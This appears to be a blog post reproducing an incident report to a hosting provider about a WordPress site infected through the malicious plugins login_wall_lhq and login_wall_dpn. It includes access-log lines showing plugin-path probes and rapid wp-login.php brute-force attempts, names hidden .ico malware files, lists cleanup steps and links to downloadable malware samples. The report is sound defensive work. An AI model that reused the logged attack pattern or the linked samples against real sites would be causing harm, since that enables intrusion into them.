176.185.171.127 - - [21/Mar/2019:19:40:10 +0100] "GET /xmlrpc.php HTTP/1.1" 405 53 "-" "Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"
192.154.105.154 - - [21/Mar/2019:19:40:19 +0100] "GET /wp-content/plugins/login_wall_lhq/ring.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
192.154.105.154 - - [21/Mar/2019:19:40:19 +0100] "GET /wp-content/plugins/login_wall_dpn/ring.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
51.15.180.239 - - [21/Mar/2019:19:40:33 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:35 +0100] "POST /wp-login.php HTTP/1.1" 200 1723 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:36 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:37 +0100] "POST /wp-login.php HTTP/1.1" 200 1699 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:38 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:39 +0100] "POST /wp-login.php HTTP/1.1" 200 1699 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:40 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:42 +0100] "POST /wp-login.php HTTP/1.1" 200 1705 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:43 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:44 +0100] "POST /wp-login.php HTTP/1.1" 200 1705 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:45 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:46 +0100] "POST /wp-login.php HTTP/1.1" 200 1707 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:47 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:48 +0100] "POST /wp-login.php HTTP/1.1" 200 1707 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:49 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:51 +0100] "POST /wp-login.php HTTP/1.1" 200 1708 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:52 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:53 +0100] "POST /wp-login.php HTTP/1.1" 200 1704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:54 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:55 +0100] "POST /wp-login.php HTTP/1.1" 200 1707 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:56 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:58 +0100] "POST /wp-login.php HTTP/1.1" 200 1707 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:40:59 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:00 +0100] "POST /wp-login.php HTTP/1.1" 200 1703 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:01 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:02 +0100] "POST /wp-login.php HTTP/1.1" 200 1703 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:03 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:04 +0100] "POST /wp-login.php HTTP/1.1" 200 1703 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:05 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:07 +0100] "POST /wp-login.php HTTP/1.1" 200 1702 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:08 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:09 +0100] "POST /wp-login.php HTTP/1.1" 200 1704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:10 +0100] "GET /wp-login.php HTTP/1.1" 200 1329 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:11 +0100] "POST /wp-login.php HTTP/1.1" 200 1706 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.180.239 - - [21/Mar/2019:19:41:12 +0100] "POST /xmlrpc.php HTTP/1.1" 200 241 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
139.59.239.30

Even suspend the website and remove all its web folder contents, those servers still trying to call infected files and other files that supposed to be "secret" and not crawled by search engines (example: /var/www/html/tajhize//wp-admin/post-new.php)

in joined files you will find a complete access_log.txt (downloaded just now, when im writing this message) with remote servers that may be infected too by this bad scripts.

at this point, its confirmed that the source of this problem was this website (tajhize.com) which its infected by a bad plugin that may be downloaded by error. and the name of this plugin is login_wall_dpn and login_wall_lhq, and also have created malicious hidden files under names like .409b2740.ico and .36144752.ico in different folders under wordpress wp-contents folder.

the actions executed to solving the problem:

-Full web folders scan.

-Full server Logs scan.

-Check services, binded apps, and running tools.

-Delete all infected files/folders.

-Delete the user owned the infected website, stoping all related services and revoke any access to the infected website by any way (http -indexed by white page-, ftp, ...etc).

-Move root folder of the infected website and shut down the website for maintenance.

-Redirect all logs to one private distincation to be scaned in the next days to prevent problem from occurring again.

Hope this repport is accepted.

Please do not hesitate to tell me if there is any information or other action required.

Cheers.

Joined files mentioned in the message:

https://www.greatsciences.com/labs/contabo/access_log.txt

https://www.greatsciences.com/labs/contabo/.409b2740.ico.txt

https://www.greatsciences.com/labs/contabo/.36144752.ico.txt

https://www.greatsciences.com/labs/contabo/2311186.txt

https://www.greatsciences.com/labs/contabo/login_wall_lhq.zip

Message to contabo (more details soon)

Aucun commentaire:

Enregistrer un commentaire